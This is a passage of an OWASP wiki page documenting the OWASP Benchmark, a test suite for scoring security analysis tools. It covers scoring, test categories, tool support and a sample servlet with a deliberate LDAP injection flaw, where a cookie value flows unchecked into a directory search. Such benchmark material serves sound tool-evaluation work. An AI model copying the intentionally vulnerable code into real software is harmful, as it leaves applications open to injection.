  And this would equate to a Benchmark score of 93 (since we normalize this to the range 0 - 100)&lt;br /&gt;
&lt;br /&gt;
On the graph, the Benchmark Score is the length of the line from the point down to the diagonal “guessing” line. Note that a Benchmark score can actually be negative if the point is below the line. This is caused when the False Positive Rate is actually higher than the True Positive Rate.&lt;br /&gt;
&lt;br /&gt;
==Benchmark Validity==&lt;br /&gt;
&lt;br /&gt;
The Benchmark tests are not exactly like real applications. The tests are derived from coding patterns observed in real applications, but the majority of them are considerably '''simpler''' than real applications. That is, most real world applications will be considerably harder to successfully analyze than the OWASP Benchmark Test Suite. Although the tests are based on real code, it is possible that some tests may have coding patterns that don't occur frequently in real code.&lt;br /&gt;
&lt;br /&gt;
Remember, we are trying to test the capabilities of the tools and make them explicit, so that users can make informed decisions about what tools to use, how to use them, and what results to expect.  This is exactly aligned with the OWASP mission to make application security visible.&lt;br /&gt;
&lt;br /&gt;
==Generating Benchmark Scores==&lt;br /&gt;
&lt;br /&gt;
Anyone can use this Benchmark to evaluate vulnerability detection tools. The basic steps are:&lt;br /&gt;
# Download the Benchmark from github&lt;br /&gt;
# Run your tools against the Benchmark&lt;br /&gt;
# Run the BenchmarkScore tool on the reports from your tools&lt;br /&gt;
&lt;br /&gt;
That's it!&lt;br /&gt;
&lt;br /&gt;
Full details on how to do this are at the bottom of the page on the Quick_Start tab.&lt;br /&gt;
&lt;br /&gt;
We encourage both vendors, open source tools, and end users to verify their application security tools against the Benchmark. In order to ensure that the results are fair and useful, we ask that you follow a few simple rules when publishing results. We won't recognize any results that aren't easily reproducible:&lt;br /&gt;
&lt;br /&gt;
# A description of the default “out-of-the-box” installation, version numbers, etc…&lt;br /&gt;
# Any and all configuration, tailoring, onboarding, etc… performed to make the tool run&lt;br /&gt;
# Any and all changes to default security rules, tests, or checks used to achieve the results&lt;br /&gt;
# Easily reproducible steps to run the tool&lt;br /&gt;
&lt;br /&gt;
== Reporting Format==&lt;br /&gt;
&lt;br /&gt;
The Benchmark includes tools to interpret raw tool output, compare it to the expected results, and generate summary charts and graphs. We use the following table format in order to capture all the information generated during the evaluation.&lt;br /&gt;
 &lt;br /&gt;
{| class=&amp;quot;wikitable nowraplinks&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; | Security Category&lt;br /&gt;
! TP&lt;br /&gt;
! FN&lt;br /&gt;
! TN&lt;br /&gt;
! FP&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; | Total&lt;br /&gt;
! TPR&lt;br /&gt;
! FPR&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; | Score&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| General security category for test cases.&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| '''True Positives''': Tests with real vulnerabilities that were correctly reported as vulnerable by the tool.&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| '''False Negative''': Tests with real vulnerabilities that were not correctly reported as vulnerable by the tool.&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| '''True Negative''': Tests with fake vulnerabilities that were correctly not reported as vulnerable by the tool.&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| '''False Positive''':Tests with fake vulnerabilities that were incorrectly reported as vulnerable by the tool.&lt;br /&gt;
| style=&amp;quot;background:#DDDDDD&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| Total test cases for this category.&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| '''True Positive Rate''': TP / ( TP + FN ) - Also referred to as Precision, as defined at [https://en.wikipedia.org/wiki/Precision_and_recall Wikipedia].&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| '''False Positive Rate''': FP / ( FP + TN ).&lt;br /&gt;
| style=&amp;quot;background:#DDDDDD&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;11%&amp;quot;| Normalized distance from the “guess line” TPR - FPR.&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; | Command Injection&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| style=&amp;quot;background:#DDDDDD&amp;quot; | ...&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| style=&amp;quot;background:#DDDDDD&amp;quot; | ...&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; | Etc...&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| style=&amp;quot;background:#DDDDDD&amp;quot; | ...&lt;br /&gt;
| ...&lt;br /&gt;
| ...&lt;br /&gt;
| style=&amp;quot;background:#DDDDDD&amp;quot; | ...&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; | &lt;br /&gt;
! Total TP&lt;br /&gt;
! Total FN&lt;br /&gt;
! Total TN&lt;br /&gt;
! Total FP&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; | Total TC&lt;br /&gt;
! Average TPR&lt;br /&gt;
! Average FPR&lt;br /&gt;
! style=&amp;quot;background:#DDDDDD&amp;quot; | Average Score&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==Code Repo and Build/Run Instructions ==&lt;br /&gt;
&lt;br /&gt;
See the '''Getting Started''' and '''Getting, Building, and Running the Benchmark''' sections on the Quick Start tab.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
The OWASP Benchmark is free to use under the [http://choosealicense.com/licenses/gpl-2.0/ GNU General Public License v2.0].&lt;br /&gt;
&lt;br /&gt;
== Mailing List ==&lt;br /&gt;
&lt;br /&gt;
[https://lists.owasp.org/mailman/listinfo/owasp-benchmark-project OWASP Benchmark Mailing List]&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/index.php/User:Wichers Dave Wichers] [mailto:dave.wichers@owasp.org @]&lt;br /&gt;
&lt;br /&gt;
== Project References ==&lt;br /&gt;
* [https://www.mir-swamp.org/#packages/public Software Assurance Marketplace (SWAMP) - set of curated packages to test tools against]&lt;br /&gt;
* [http://samate.nist.gov/Other_Test_Collections.html SAMATE List of Test Collections]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [http://samate.nist.gov/SARD/testsuite.php NSA's Juliet for Java]&lt;br /&gt;
* [http://sectoolmarket.com/ The Web Application Vulnerability Scanner Evaluation Project (WAVSEP)]&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
All test code and project files can be downloaded from [https://github.com/OWASP/benchmark OWASP GitHub].&lt;br /&gt;
&lt;br /&gt;
== Project Intro Video ==&lt;br /&gt;
&lt;br /&gt;
[[File:BenchmarkPodcastTitlePage.jpg|200px|link=https://www.youtube.com/watch?v=HQP8dwc3jJA&amp;amp;index=5&amp;amp;list=PLGB2s-U5FSWOmEStMt3JqlMFJvRYqeVW5]]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* LOOKING FOR VOLUNTEERS!! - We are looking for individuals and organizations to join and make this a much more community driven project, including additional coleaders to help take this project to the next level. Contributors could work on things like new test cases, additional tool scorecard generators, adding support for languages beyond Java, and a host of other improvements. Please contact [mailto:dave.wichers@owasp.org me] if you are interested in contributing at any level.&lt;br /&gt;
* June 5, 2016 - Benchmark Version 1.2 Released&lt;br /&gt;
* Sep 24, 2015 - Benchmark introduced to broader OWASP community at [https://appsecusa2015.sched.org/event/3r9k/using-the-owasp-benchmark-to-assess-automated-vulnerability-analysis-tools AppSec USA]&lt;br /&gt;
* Aug 27, 2015 - U.S. Dept. of Homeland Security (DHS) is financially supporting the Benchmark project.&lt;br /&gt;
* Aug 15, 2015 - Benchmark Version 1.2beta Released with full DAST Support. Checkmarx and ZAP scorecard generators also released.&lt;br /&gt;
* July 10, 2015 - Benchmark Scorecard generator and open source scorecards released&lt;br /&gt;
* May 23, 2015 - Benchmark Version 1.1 Released&lt;br /&gt;
* April 15, 2015 - Benchmark Version 1.0 Released&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [http://choosealicense.com/licenses/gpl-2.0/ GNU General Public License v2.0]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Test Cases =&lt;br /&gt;
&lt;br /&gt;
Version 1.0 of the Benchmark was published on April 15, 2015 and had 20,983 test cases. On May 23, 2015, version 1.1 of the Benchmark was released. The 1.1 release improves on the previous version by making sure that there are both true positives and false positives in every vulnerability area. Version 1.2 was released on June 5, 2016 (and the 1.2beta August 15, 2015).&lt;br /&gt;
&lt;br /&gt;
Version 1.2 and forward of the Benchmark is a fully executable web application, which means it is scannable by any kind of vulnerability detection tool. The 1.2 has been limited to slightly less than 3,000 test cases, to make it easier for DAST tools to scan it (so it doesn't take so long and they don't run out of memory, or blow up the size of their database). The 1.2 release covers the same vulnerability areas that 1.1 covers. We added a few Spring database SQL Injection tests, but that's it. The bulk of the work was turning each test case into something that actually runs correctly AND is fully exploitable, and then generating a UI on top of it that works in order to turn the test cases into a real running application.&lt;br /&gt;
&lt;br /&gt;
You can still download Benchmark version 1.1 by cloning the release marked with the GIT tag '1.1'.&lt;br /&gt;
&lt;br /&gt;
The test case areas and quantities for the Benchmark releases are:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable nowraplinks&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Vulnerability Area&lt;br /&gt;
! # of Tests in v1.1&lt;br /&gt;
! # of Tests in v1.2&lt;br /&gt;
! CWE Number&lt;br /&gt;
|-&lt;br /&gt;
| [[Command Injection]]&lt;br /&gt;
| 2708&lt;br /&gt;
| 251&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/78.html 78]&lt;br /&gt;
|-&lt;br /&gt;
| Weak Cryptography&lt;br /&gt;
| 1440&lt;br /&gt;
| 246&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/327.html 327]&lt;br /&gt;
|-&lt;br /&gt;
| Weak Hashing&lt;br /&gt;
| 1421&lt;br /&gt;
| 236&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/328.html 328]&lt;br /&gt;
|-&lt;br /&gt;
| [[LDAP injection | LDAP Injection]]&lt;br /&gt;
| 736&lt;br /&gt;
| 59&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/90.html 90]&lt;br /&gt;
|-&lt;br /&gt;
| [[Path Traversal]]&lt;br /&gt;
| 2630&lt;br /&gt;
| 268&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/22.html 22]&lt;br /&gt;
|-&lt;br /&gt;
| Secure Cookie Flag&lt;br /&gt;
| 416&lt;br /&gt;
| 67&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/614.html 614]&lt;br /&gt;
|-&lt;br /&gt;
| [[SQL Injection]]&lt;br /&gt;
| 3529&lt;br /&gt;
| 504&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/89.html 89]&lt;br /&gt;
|-&lt;br /&gt;
| [[Trust Boundary Violation]]&lt;br /&gt;
| 725&lt;br /&gt;
| 126&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/501.html 501]&lt;br /&gt;
|-&lt;br /&gt;
| Weak Randomness&lt;br /&gt;
| 3640&lt;br /&gt;
| 493&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/330.html 330]&lt;br /&gt;
|-&lt;br /&gt;
| [[XPATH Injection]]&lt;br /&gt;
| 347&lt;br /&gt;
| 35&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/643.html 643]&lt;br /&gt;
|-&lt;br /&gt;
| [[XSS]] (Cross-Site Scripting)&lt;br /&gt;
| 3449&lt;br /&gt;
| 455&lt;br /&gt;
| [https://cwe.mitre.org/data/definitions/79.html 79]&lt;br /&gt;
|-&lt;br /&gt;
| Total Test Cases&lt;br /&gt;
| 21,041&lt;br /&gt;
| 2,740&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Each Benchmark version comes with a spreadsheet that lists every test case, the vulnerability category, the CWE number, and the expected result (true finding/false positive). Look for the file: expectedresults-VERSION#.csv in the project root directory.&lt;br /&gt;
&lt;br /&gt;
Every test case is:&lt;br /&gt;
* a servlet or JSP (currently they are all servlets, but we plan to add JSPs)&lt;br /&gt;
* either a true vulnerability or a false positive for a single issue&lt;br /&gt;
&lt;br /&gt;
The Benchmark is intended to help determine how well analysis tools correctly analyze a broad array of application and framework behavior, including:&lt;br /&gt;
&lt;br /&gt;
* HTTP request and response problems&lt;br /&gt;
* Simple and complex data flow&lt;br /&gt;
* Simple and complex control flow&lt;br /&gt;
* Popular frameworks&lt;br /&gt;
* Inversion of control&lt;br /&gt;
* Reflection&lt;br /&gt;
* Class loading&lt;br /&gt;
* Annotations&lt;br /&gt;
* Popular UI technologies (particularly JavaScript frameworks)&lt;br /&gt;
&lt;br /&gt;
Not all of these are yet tested by the Benchmark but future enhancements intend to provide more coverage of these issues.&lt;br /&gt;
&lt;br /&gt;
Additional future enhancements could cover:&lt;br /&gt;
* All vulnerability types in the [[Top10 | OWASP Top 10]]&lt;br /&gt;
* Does the tool find flaws in libraries?&lt;br /&gt;
* Does the tool find flaws spanning custom code and libraries?&lt;br /&gt;
* Does tool handle web services? REST, XML, GWT, etc…&lt;br /&gt;
* Does tool work with different app servers? Java platforms?&lt;br /&gt;
&lt;br /&gt;
== Example Test Case ==&lt;br /&gt;
&lt;br /&gt;
Each test case is a simple Java EE servlet. BenchmarkTest00001 in version 1.0 of the Benchmark was an LDAP Injection test with the following metadata in the accompanying BenchmarkTest00001.xml file:&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;test-metadata&amp;gt;&lt;br /&gt;
    &amp;lt;category&amp;gt;ldapi&amp;lt;/category&amp;gt;&lt;br /&gt;
    &amp;lt;test-number&amp;gt;00001&amp;lt;/test-number&amp;gt;&lt;br /&gt;
    &amp;lt;vulnerability&amp;gt;true&amp;lt;/vulnerability&amp;gt;&lt;br /&gt;
    &amp;lt;cwe&amp;gt;90&amp;lt;/cwe&amp;gt;&lt;br /&gt;
  &amp;lt;/test-metadata&amp;gt;&lt;br /&gt;
&lt;br /&gt;
BenchmarkTest00001.java in the OWASP Benchmark 1.0 simply reads in all the cookie values, looks for a cookie named &amp;quot;foo&amp;quot;, and uses the value of this cookie when performing an LDAP query. Here's the code for BenchmarkTest00001.java:&lt;br /&gt;
&lt;br /&gt;
  package org.owasp.benchmark.testcode;&lt;br /&gt;
  &lt;br /&gt;
  import java.io.IOException;&lt;br /&gt;
  &lt;br /&gt;
  import javax.servlet.ServletException;&lt;br /&gt;
  import javax.servlet.annotation.WebServlet;&lt;br /&gt;
  import javax.servlet.http.HttpServlet;&lt;br /&gt;
  import javax.servlet.http.HttpServletRequest;&lt;br /&gt;
  import javax.servlet.http.HttpServletResponse;&lt;br /&gt;
  &lt;br /&gt;
  @WebServlet(&amp;quot;/BenchmarkTest00001&amp;quot;)&lt;br /&gt;
  public class BenchmarkTest00001 extends HttpServlet {&lt;br /&gt;
  	&lt;br /&gt;
  	private static final long serialVersionUID = 1L;&lt;br /&gt;
  	&lt;br /&gt;
  	@Override&lt;br /&gt;
  	public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {&lt;br /&gt;
  		doPost(request, response);&lt;br /&gt;
  	}&lt;br /&gt;
  &lt;br /&gt;
  	@Override&lt;br /&gt;
  	public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {&lt;br /&gt;
  		// some code&lt;br /&gt;
  &lt;br /&gt;
  		javax.servlet.http.Cookie[] cookies = request.getCookies();&lt;br /&gt;
  		&lt;br /&gt;
  		String param = null;&lt;br /&gt;
  		boolean foundit = false;&lt;br /&gt;
  		if (cookies != null) {&lt;br /&gt;
  			for (javax.servlet.http.Cookie cookie : cookies) {&lt;br /&gt;
  				if (cookie.getName().equals(&amp;quot;foo&amp;quot;)) {&lt;br /&gt;
  					param = cookie.getValue();&lt;br /&gt;
  					foundit = true;&lt;br /&gt;
  				}&lt;br /&gt;
  			}&lt;br /&gt;
  			if (!foundit) {&lt;br /&gt;
  				// no cookie found in collection&lt;br /&gt;
  				param = &amp;quot;&amp;quot;;&lt;br /&gt;
  			}&lt;br /&gt;
  		} else {&lt;br /&gt;
  			// no cookies&lt;br /&gt;
  			param = &amp;quot;&amp;quot;;&lt;br /&gt;
  		}&lt;br /&gt;
  		&lt;br /&gt;
  		try {&lt;br /&gt;
  			javax.naming.directory.DirContext dc = org.owasp.benchmark.helpers.Utils.getDirContext();&lt;br /&gt;
  			Object[] filterArgs = {&amp;quot;a&amp;quot;,&amp;quot;b&amp;quot;};&lt;br /&gt;
  			dc.search(&amp;quot;name&amp;quot;, param, filterArgs, new javax.naming.directory.SearchControls());&lt;br /&gt;
  		} catch (javax.naming.NamingException e) {&lt;br /&gt;
  			throw new ServletException(e);&lt;br /&gt;
  		}&lt;br /&gt;
  	}&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
= Test Case Details =&lt;br /&gt;
&lt;br /&gt;
The following describes situations in the Benchmark that have come up for debate as to the validity/accuracy of the test cases in these scenarios. &lt;br /&gt;
&lt;br /&gt;
== Cookies as a Source of Attack for XSS ==&lt;br /&gt;
&lt;br /&gt;
Benchmark v1.1 and early versions of the 1.2beta included test cases that used cookies as a source of data that flowed into XSS vulnerabilities. The Benchmark treated these tests as False Positives because the Benchmark team figured that you'd have to use an XSS vulnerability in the first place to set the cookie value, and so it wasn't fair/reasonable to consider an XSS vulnerability whose data source was a cookie value as actually exploitable. However, we got feedback from some tool vendors, like Fortify, Burp, and Arachni, that they disagreed with this analysis and felt that, in fact, cookies were a valid source of attack against XSS vulnerabilities. Given that there are good arguments on both sides of this safe vs. unsafe question, we decided on Aug 25, 2015 to simply remove those test cases from the Benchmark. If, in the future, we decide who is right, we may add such test cases back in.&lt;br /&gt;
&lt;br /&gt;
== Headers as a Source of Attack for XSS ==&lt;br /&gt;
&lt;br /&gt;
Similarly, the Benchmark team believes that the names of headers aren't a valid source of XSS attack for the same reason we thought cookie values aren't a valid source. Because it would require an XSS vulnerability to be exploited in the first place to set them. In fact, we feel that this argument is much stronger for header names, than cookie values. Right now, the Benchmark doesn't include any header names as sources for XSS test cases, but we plan to add them, and mark them as false positive in the Benchmark.&lt;br /&gt;
&lt;br /&gt;
We do have header values as sources for some XSS test cases in the Benchmark and only 'referer' is treated as a valid XSS source (i.e., true positives) because other headers are not viable XSS sources. Other headers are, of course, valid sources for other attack vectors, like SQL injection or Command Injection.&lt;br /&gt;
&lt;br /&gt;
== False Positive Scenario: Static Values Passed to Unsafe (Weak) Sinks ==&lt;br /&gt;
&lt;br /&gt;
The Benchmark has MANY test cases where unsafe data flows in from the browser, but that data is replaced with static content as it goes through the propagators in the that specific test case. This static (safe) data then flows to the sink, which may be a weak/unsafe sink, like, for example, an unsafely constructed SQL statement. The Benchmark treats those test cases as false positives because there is absolutely no way for that weakness to be exploited. The NSA Juliet SAST benchmark treats such test cases exactly the same way, as false positives. We do recognize that there are weaknesses in those test cases, even though they aren't exploitable.&lt;br /&gt;
&lt;br /&gt;
Some SAST tool vendors feel it is appropriate to point out those weaknesses, and that's fine. However, if the tool points those weaknesses out, and does not distinguish them from truly exploitable vulnerabilities, then the Benchmark treats those findings as false positives. If the tool allows a user to differentiate these non-exploitable weaknesses from exploitable vulnerabilities, then the Benchmark scorecard generator can use that information to filter out these extra findings (along with any other similarly marked findings) so they don't count against that tool when calculating that tool's Benchmark score.  In the real world, its important for analysts to be able to filter out such findings if they only have time to deal with the most critical, actually exploitable, vulnerabilities. If a tool doesn't make it easy for an analyst to distinguish the two situations, then they are providing a disservice to the analyst.&lt;br /&gt;
&lt;br /&gt;
This issue doesn't affect DAST tools. They only report what appears to be exploitable to them. So this has no affect on them.&lt;br /&gt;
&lt;br /&gt;
If you are a SAST tool vendor or user, and you believe the Benchmark scorecard generator is counting such findings against that tool, and there is a way to tell them apart, please let the project team know so the scorecard generator can be adjusted to not count those findings against the tool. The Benchmark project's goal is the generate the most fair and accurate results it can generate. If such an adjustment is made to how a scorecard is generated for that tool, we plan to document this was done for that tool, and explain how others could perform the same filtering within that tool in order to get the same focused set of results.&lt;br /&gt;
&lt;br /&gt;
== Dead Code ==&lt;br /&gt;
&lt;br /&gt;
Some SAST tools point out weaknesses in dead code because they might eventually end up being used, and serve as bad coding examples (think cut/paste of code). We think this is fine/appropriate.  However, there is no dead code in the OWASP Benchmark (at least not intentionally). So dead code should not be causing any tool to report unnecessary false positives.&lt;br /&gt;
&lt;br /&gt;
= Tool Support/Results =&lt;br /&gt;
&lt;br /&gt;
The results for 5 free tools, PMD, FindBugs, FindBugs with the FindSecBugs plugin, SonarQube and OWASP ZAP are available here against version 1.2 of the Benchmark: https://rawgit.com/OWASP/Benchmark/master/scorecard/OWASP_Benchmark_Home.html. We've included multiple versions of FindSecBugs' and ZAP's results so you can see the improvements they are making finding vulnerabilities in Benchmark.&lt;br /&gt;
&lt;br /&gt;
We have Benchmark results for all the following tools, but haven't publicly released the results for any commercial tools. However, we included a 'Commercial Average' page, which includes a summary of results for 6 commercial SAST tools along with anonymous versions of each SAST tool's scorecard.&lt;br /&gt;
&lt;br /&gt;
The Benchmark can generate results for the following tools: &lt;br /&gt;
&lt;br /&gt;
'''Free Static Application Security Testing (SAST) Tools:'''&lt;br /&gt;
&lt;br /&gt;
* [http://pmd.sourceforge.net/ PMD] (which really has no security rules) - .xml results file&lt;br /&gt;
* [http://findbugs.sourceforge.net/ Findbugs] - .xml results file&lt;br /&gt;
* FindBugs with the [http://h3xstream.github.io/find-sec-bugs/ FindSecurityBugs plugin] - .xml results file&lt;br /&gt;
* [http://www.sonarqube.org/downloads/ SonarQube] - .xml results file&lt;br /&gt;
* [http://www.rigs-it.net/index.php/product.html XANITIZER] - (Requires registration to download) - xml results file&lt;br /&gt;
&lt;br /&gt;
Note: We looked into supporting [http://checkstyle.sourceforge.net/ Checkstyle] but it has no security rules, just like PMD. The [http://fb-contrib.sourceforge.net/ fb-contrib] FindBugs plugin doesn't have any security rules either. We did test [http://errorprone.info/ Error Prone], and found that it does report some use of [http://errorprone.info/bugpattern/InsecureCipherMode) insecure ciphers (CWE-327)], but that's it.&lt;br /&gt;
&lt;br /&gt;
'''Commercial SAST Tools:'''&lt;br /&gt;
&lt;br /&gt;
* [https://www.checkmarx.com/technology/static-code-analysis-sca/ Checkmarx CxSAST] - .xml results file&lt;br /&gt;
* [http://www.coverity.com/products/code-advisor/ Coverity Code Advisor (On-Demand and stand-alone versions)] - .json results file&lt;br /&gt;
* [http://www8.hp.com/us/en/software-solutions/static-code-analysis-sast/index.html HP Fortify (On-Demand and stand-alone versions)] - .fpr results file&lt;br /&gt;
* [http://www-03.ibm.com/software/products/en/appscan-source IBM AppScan Source] - .ozasmt results file&lt;br /&gt;
* [http://www.juliasoft.com/eng/solutions/overview Julia Analyzer] - .xml results file&lt;br /&gt;
* [http://www.parasoft.com/product/jtest/ Parasoft Jtest] - .xml results file&lt;br /&gt;
* [https://www.sourcemeter.com/features/ SourceMeter] - .txt results file of ALL results from VulnerabilityHunter&lt;br /&gt;
* [http://www.veracode.com/products/binary-static-analysis-sast Veracode SAST] - .xml results file&lt;br /&gt;
&lt;br /&gt;
We are looking for results for other commercial static analysis tools like: [http://www.grammatech.com/codesonar Grammatech CodeSonar], [http://www.klocwork.com/products-services/klocwork Klocwork], etc. If you have a license for any static analysis tool not already listed above and can run it on the Benchmark and send us the results file that would be very helpful. &lt;br /&gt;
&lt;br /&gt;
The free SAST tools come bundled with the Benchmark so you can run them yourselves. If you have a license for any commercial SAST tool, you can also run them against the Benchmark. Just put your results files in the /results folder of the project, and then run the BenchmarkScore script for your platform (.sh / .bat) and it will generate a scorecard in the /scorecard directory for all the tools you have results for that are currently supported.&lt;br /&gt;
&lt;br /&gt;
'''Free Dynamic Application Security Testing (DAST) Tools:'''&lt;br /&gt;
&lt;br /&gt;
Note: While we support scorecard generators for these Free and Commercial DAST tools, we haven't been able to get a full/clean run against the Benchmark from most of these tools. As such, some of these scorecard generators might still need some work to properly reflect their results. If you notice any problems, let us know.&lt;br /&gt;
&lt;br /&gt;
* [http://www.arachni-scanner.com/ Arachni] - .xml results file&lt;br /&gt;
** To generate .xml, run: ./bin/arachni_reporter &amp;quot;Your_AFR_Results_Filename.afr&amp;quot; --reporter=xml:outfile=Benchmark1.2-Arachni.xml&lt;br /&gt;
* [https://www.owasp.org/index.php/ZAP OWASP ZAP] - .xml results file&lt;br /&gt;
&lt;br /&gt;
'''Commercial DAST Tools:'''&lt;br /&gt;
&lt;br /&gt;
* [https://www.acunetix.com/vulnerability-scanner/ Acunetix Web Vulnerability Scanner (WVS)] - .xml results file (Generated using [http://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/ command line interface] /ExportXML switch)&lt;br /&gt;
* [https://portswigger.net/burp/ Burp Pro] - .xml results file&lt;br /&gt;
**You must use Burp Pro v1.6.30+ to scan the Benchmark due to a limitation fixed in v1.6.30.&lt;br /&gt;
* [http://www8.hp.com/us/en/software-solutions/webinspect-dynamic-analysis-dast/ HP WebInspect] - .xml results file&lt;br /&gt;
* [http://www-03.ibm.com/software/products/en/appscan IBM AppScan] - .xml results file&lt;br /&gt;
* [https://www.netsparker.com/web-vulnerability-scanner/ Netsparker] - .xml results file&lt;br /&gt;
* [http://www.rapid7.com/products/appspider/ Rapid7 AppSpider] - .xml results file&lt;br /&gt;
&lt;br /&gt;
* Qualys - We ran Qualys against v1.2 of the Benchmark and it found none of the vulnerabilities we test for as far as we could tell. So we haven't implemented a scorecard generator for it. If you get results where you think it does find some real issues, send us the results file and, if confirmed, we'll produce a scorecard generator for it.&lt;br /&gt;
&lt;br /&gt;
If you have access to other DAST Tools, PLEASE RUN THEM FOR US against the Benchmark, and send us the results file so we can build a scorecard generator for that tool.&lt;br /&gt;
&lt;br /&gt;
'''Commercial Interactive Application Security Testing (IAST) Tools:'''&lt;br /&gt;
&lt;br /&gt;
* [http://www.contrastsecurity.com/features Contrast] - .zip results file&lt;br /&gt;
&lt;br /&gt;
'''Commercial Hybrid Analysis Application Security Testing Tools:'''&lt;br /&gt;
&lt;br /&gt;
* [http://www.iappsecure.com/products.html Fusion Lite Insight] - .xml results file&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''WARNING: If you generate results for a commercial tool, be careful who you distribute it to. Each tool has its own license defining when any results it produces can be released/made public. It may be against the terms of a commercial tool's license to publicly release that tool's score against the OWASP Benchmark. The OWASP Benchmark project takes no responsibility if someone else releases such results.'''&lt;br /&gt;
&lt;br /&gt;
The project has automated test harnesses for these vulnerability detection tools, so we can repeatably run the tools against each version of the Benchmark and automatically produce scorecards in our desired format.&lt;br /&gt;
&lt;br /&gt;
We want to test as many tools as possible against the Benchmark. If you are:&lt;br /&gt;
&lt;br /&gt;
* A tool vendor and want to participate in the project&lt;br /&gt;
* Someone who wants to help score a free tool against the project&lt;br /&gt;
* Someone who has a license to a commercial tool and the terms of the license allow you to publish tool results, and you want to participate&lt;br /&gt;
&lt;br /&gt;
please let [mailto:dave.wichers@owasp.org me] know!&lt;br /&gt;
&lt;br /&gt;
= Quick Start =&lt;br /&gt;
&lt;br /&gt;
==What is in the Benchmark?==&lt;br /&gt;
The Benchmark is a Java Maven project. Its primary component is thousands of test cases (e.g., BenchmarkTest00001.java) , each of which is a single Java servlet that contains a single vulnerability (either a true positive or false positive). The vulnerabilities span about a dozen different types currently and are expected to expand significantly in the future.&lt;br /&gt;
&lt;br /&gt;
An expectedresults.csv is published with each version of the Benchmark (e.g., expectedresults-1.1.csv) and it specifically lists the expected results for each test case. Here’s what the first two rows in this file looks like for version 1.1 of the Benchmark:&lt;br /&gt;
&lt;br /&gt;
